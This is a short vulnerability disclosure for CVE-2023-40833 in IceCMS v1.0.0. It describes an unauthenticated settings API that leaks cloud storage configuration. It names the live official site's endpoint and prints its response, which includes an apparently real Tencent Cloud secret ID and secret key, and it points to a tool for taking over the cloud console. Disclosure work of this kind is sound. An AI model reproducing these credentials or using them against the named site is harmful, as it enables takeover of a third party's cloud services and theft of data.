Headline
CVE-2023-40833: CVE-2023-40833
An issue in Thecosy IceCMS v.1.0.0 allows a remote attacker to gain privileges via the Id and key parameters in getCosSetting.
[CVE ID]
CVE-2023-40833
[PRODUCT]
icecms
[VERSION]
v1.0.0
[Vulnerability TYPE]
Insecure Permissions
[Root Cause]
The icecms allows anyone to browser getSetting api,like my local test environment http://localhost:8181/WebSitting/getSetting,
and official website url:https://www.macwk.cc/api/Sitting/getCosSetting.
The official website content is :
{
"id": 1,
"beian": "鲁ICP备19036164号",
"banquan": "Macwk.com © 2019. All rights reserved.",
"comment_show": false,
"sitTitle": "CMS",
"sitLogo": "",
"imageFormat": false,
"cosIntage": "https://icewk-1305088812.cos.ap-nanjing.myqcloud.com",
"cosBucketName": "icewk-1305088812",
"cosSecretId": "AKIDjDRQDrRXcA7TfQNk9LO3EJchbFeneY4U",
"cosSecretKey": "blgxyuiIfnCLaZXH5i6FB4gmDPilY8zb",
"cosClientConfig": "ap-nanjing",
"isCos": false
}
Attacker can get "cosSecretId": "AKIDjDRQDrRXcA7TfQNk9LO3EJchbFeneY4U","cosSecretKey": "blgxyuiIfnCLaZXH5i6FB4gmDPilY8zb",
From content above (cosIntage) link, we can know official website using Elastic Compute Cloud ,Tencent Cloud platform (like AWS cloud platform).
We can use such tool (https://wiki.teamssix.com/cf/) taking over the official user’s Tencent cloud platform console,getting all cloud services.
[Impact]
Taking over the official user’s Tencent cloud platform console,can poweroff the server ,getting server’s all things including source code.